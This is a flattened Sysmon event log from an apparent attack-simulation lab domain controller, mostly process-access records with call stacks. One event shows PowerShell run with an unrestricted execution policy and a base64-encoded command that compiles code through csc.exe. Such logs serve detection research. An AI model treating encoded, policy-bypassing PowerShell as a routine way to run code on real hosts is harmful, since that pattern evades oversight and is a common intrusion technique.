15:52:08.043{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003168Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:08.043{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003167Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:08.043{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003166Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:08.043{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003165Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:08.043{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003164Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:08.043{D28789B6-7C62-5FA1-0500-000000008801}644804C:\Windows\system32\csrss.exe{D28789B6-7CA8-5FA1-9700-000000008801}5044C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000003163Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:08.043{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003162Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:08.043{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003161Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:08.043{D28789B6-7CA7-5FA1-9500-000000008801}26002764C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{D28789B6-7CA8-5FA1-9700-000000008801}5044C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+3332f6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+270222|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+26fe9f|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+26f9ee|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+26f97a|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+26e48b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+7c1edb|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+7c19a9|UNKNOWN(00007FF8DCA0B68F) 10341000x80000000000000003160Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:08.043{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000003159Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:08.008{D28789B6-7CA8-5FA1-9700-000000008801}5044C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe4.7.2053.0 built by: NET47REL1Visual C# Command Line CompilerMicrosoft® .NET FrameworkMicrosoft Corporationcsc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\ADMINI~1\AppData\Local\Temp\j4qugwyi.cmdline"C:\Users\Administrator\ATTACKRANGE\Administrator{D28789B6-7CA7-5FA1-A343-060000000000}0x643a30HighMD5=4360A98D8785625667D2574D2DD5C988,SHA256=F7DB25AA420C14C514690C1E943EC1E729596973E911B3445DFAD42FE958711D,IMPHASH=ED2AE001A3FDD84BDC04C99A98883A52{D28789B6-7CA7-5FA1-9500-000000008801}2600C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand JgBjAGgAYwBwAC4AYwBvAG0AIAA2ADUAMAAwADEAIAA+ACAAJABuAHUAbABsAAoAJABlAHgAZQBjAF8AdwByAGEAcABwAGUAcgBfAHMAdAByACAAPQAgACQAaQBuAHAAdQB0ACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcACgAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAgAD0AIAAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAF8AcwB0AHIALgBTAHAAbABpAHQAKABAACgAIgBgADAAYAAwAGAAMABgADAAIgApACwAIAAyACwAIABbAFMAdAByAGkAbgBnAFMAcABsAGkAdABPAHAAdABpAG8AbgBzAF0AOgA6AFIAZQBtAG8AdgBlAEUAbQBwAHQAeQBFAG4AdAByAGkAZQBzACkACgBJAGYAIAAoAC0AbgBvAHQAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAuAEwAZQBuAGcAdABoACAALQBlAHEAIAAyACkAIAB7ACAAdABoAHIAbwB3ACAAIgBpAG4AdgBhAGwAaQBkACAAcABhAHkAbABvAGEAZAAiACAAfQAKAFMAZQB0AC0AVgBhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAAagBzAG8AbgBfAHIAYQB3ACAALQBWAGEAbAB1AGUAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADEAXQAKACQAZQB4AGUAYwBfAHcAcgBhAHAAcABlAHIAIAA9ACAAWwBTAGMAcgBpAHAAdABCAGwAbwBjAGsAXQA6ADoAQwByAGUAYQB0AGUAKAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADAAXQApAAoAJgAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAA== 11241100x80000000000000003158Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:07.996{D28789B6-7CA7-5FA1-9500-000000008801}2600C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\j4qugwyi.cmdline2020-11-03 15:52:07.996 11241100x80000000000000003157Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.localDLL2020-11-03 15:52:07.996{D28789B6-7CA7-5FA1-9500-000000008801}2600C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\j4qugwyi.dll2020-11-03 15:52:07.996 10341000x80000000000000003350Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:09.969{D28789B6-7CA9-5FA1-A000-000000008801}46365092C:\Windows\system32\conhost.exe{D28789B6-7CA9-5FA1-A200-000000008801}4380C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003349Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:09.969{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003348Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:09.969{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003347Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:09.969{D28789B6-7C62-5FA1-0B00-000000008801}8684712C:\Windows\system32\lsass.exe{D28789B6-7C64-5FA1-1500-000000008801}1336C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003346Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:09.969{D28789B6-7C62-5FA1-0B00-000000008801}8684712C:\Windows\system32\lsass.exe{D28789B6-7C64-5FA1-1500-000000008801}1336C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003345Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:09.969{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003344Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:09.969{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003343Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:09.969{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003342Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:09.969{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003341Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:09.969{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003340Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:09.969{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003339Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:09.969{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003338Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 